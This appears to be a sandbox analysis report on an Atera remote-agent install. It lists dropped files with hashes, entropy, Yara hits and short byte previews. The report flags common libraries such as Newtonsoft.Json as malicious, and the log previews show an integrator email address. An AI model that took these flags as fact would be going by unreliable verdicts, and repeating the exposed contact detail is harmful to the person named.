                                                                                                                                                                                                                                                                                              SHA1:6B613C73ACB58D259C6379BD820CCA6F785CC812
                                                                                                                                                                                                                                                                                              SHA-256:1F78F1056761C6EBD8965ED2C06295BAFA704B253AFF56C492B93151AB642899
                                                                                                                                                                                                                                                                                              SHA-512:7630E1629CF4ABECD9D3DDEA58227B232D5C775CB480967762A6A6466BE872E1D57123B08A6179FE1CFBC09403117D0F81BC13724F259A1D25C1325F1EAC645B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?><ArrayOfKeyValueOfanyTypeanyType xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:x="http://www.w3.org/2001/XMLSchema" z:Id="1" z:Type="System.Collections.Hashtable" z:Assembly="0" xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><LoadFactor z:Id="2" z:Type="System.Single" z:Assembly="0" xmlns="">0.72</LoadFactor><Version z:Id="3" z:Type="System.Int32" z:Assembly="0" xmlns="">2</Version><Comparer i:nil="true" xmlns="" /><HashCodeProvider i:nil="true" xmlns="" /><HashSize z:Id="4" z:Type="System.Int32" z:Assembly="0" xmlns="">3</HashSize><Keys z:Id="5" z:Type="System.Object[]" z:Assembly="0" z:Size="2" xmlns=""><anyType z:Id="6" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">_reserved_nestedSavedStates</anyType><anyType z:Id="7" z:Type="System.String" z:Assembly="0" xmlns="http://schemas.microsoft.com/20

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145968
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                              MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                              SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                              SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\AteraAgent.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1442
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                              MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                              SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                              SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                              SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):215088
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                                                                              MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                                                                              SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                                                                              SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                                                                              SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710192
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                                                                              MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                                                                              SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                                                                              SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                                                                              SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):602672
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                                                                              MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                                                                              SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                                                                              SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                                                                              SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                                                                              MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                                                                              SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                                                                              SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                                                                              SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167458100356664
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:AIilND9w3pKFSQcKshMQkOlCgDp7OgRDX:9iSMSQcwOYsp6gX
                                                                                                                                                                                                                                                                                              MD5:6090DAC6BD4453F6568436B37E915FEB
                                                                                                                                                                                                                                                                                              SHA1:BBB5B92049BBD78D8AC37C6D5B35DAEAD0959B7E
                                                                                                                                                                                                                                                                                              SHA-256:86FF69773FB439A2460747E487C5B61468C84385E967404C552A7B182721CD22
                                                                                                                                                                                                                                                                                              SHA-512:64D2AE3935F30A04A3A31B82800912066CD9AD186CC7A46D976F8796550D9CB8CE2AA5B3A041E6B07034E6E2072289D4263A8BAFC273CE82F079FA7C205876DE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:/i /IntegratorLogin=contato@fazendadoscordeiros.com.br /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000P2oAPIAZ /AgentId=52187e48-563c-468d-9785-3542f81fb412.06/01/2025 06:58:08 Trace Starting..06/01/2025 06:58:32 Trace Starting..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\inprocmessaging\trayProcessMessages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):178
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.302048312078957
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:5PbTsIvBxC2yrVQ3pxOLKQl6UgMHwiridk6Y4mWDShTufrsf3J2MzqRI+OPkvOy:RbTpJxO80LhlRgMHRidk6JmWDShTuj2G
                                                                                                                                                                                                                                                                                              MD5:20A0D9588ED3729111B94607198FFC68
                                                                                                                                                                                                                                                                                              SHA1:475AD1C0CF64ED9653A00A8F1B1943C7CEB23520
                                                                                                                                                                                                                                                                                              SHA-256:BCA9A7D641BFDBFDF1F133EC1FADF3CA3611602A47AFE550A0D14A722529E80A
                                                                                                                                                                                                                                                                                              SHA-512:D8F4076B7E3237985FB4A14B9FA7AD3F5A70158C0D75D1B07AC972C42961077124C6B017271329685CCF3110CE6C47781A95CE97F44A35CA2251FC47FF89EBD0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:eyJJZCI6ImFjZjhlYmZjLWM0ZDctNGFkMS05NjNjLTYzNzBiNTQyYmM0ZCIsIkNyZWF0ZWQiOiIyMDI1LTAxLTA2VDA2OjU5OjE0LjU3Nzg1MDUtMDU6MDAiLCJNZXNzYWdlIjoiX0lOSVRfIiwiVGltZW91dCI6IjAwOjAxOjAwIn0=..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.167458100356664
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:AIilND9w3pKFSQcKshMQkOlCgDp7OgRDX:9iSMSQcwOYsp6gX
                                                                                                                                                                                                                                                                                              MD5:6090DAC6BD4453F6568436B37E915FEB
                                                                                                                                                                                                                                                                                              SHA1:BBB5B92049BBD78D8AC37C6D5B35DAEAD0959B7E
                                                                                                                                                                                                                                                                                              SHA-256:86FF69773FB439A2460747E487C5B61468C84385E967404C552A7B182721CD22
                                                                                                                                                                                                                                                                                              SHA-512:64D2AE3935F30A04A3A31B82800912066CD9AD186CC7A46D976F8796550D9CB8CE2AA5B3A041E6B07034E6E2072289D4263A8BAFC273CE82F079FA7C205876DE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:/i /IntegratorLogin=contato@fazendadoscordeiros.com.br /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000P2oAPIAZ /AgentId=52187e48-563c-468d-9785-3542f81fb412.06/01/2025 06:58:08 Trace Starting..06/01/2025 06:58:32 Trace Starting..

                                                                                                                                                                                                                                                                                              C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):145968
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                                                                              MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                                                                              SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                                                                              SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                                                                              SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                                                                              C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1442
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                                                                              MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                                                                              SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                                                                              SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                                                                              SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                                                                              C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3318832
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                                                                              MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                                                                              SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                                                                              SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                                                                              SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
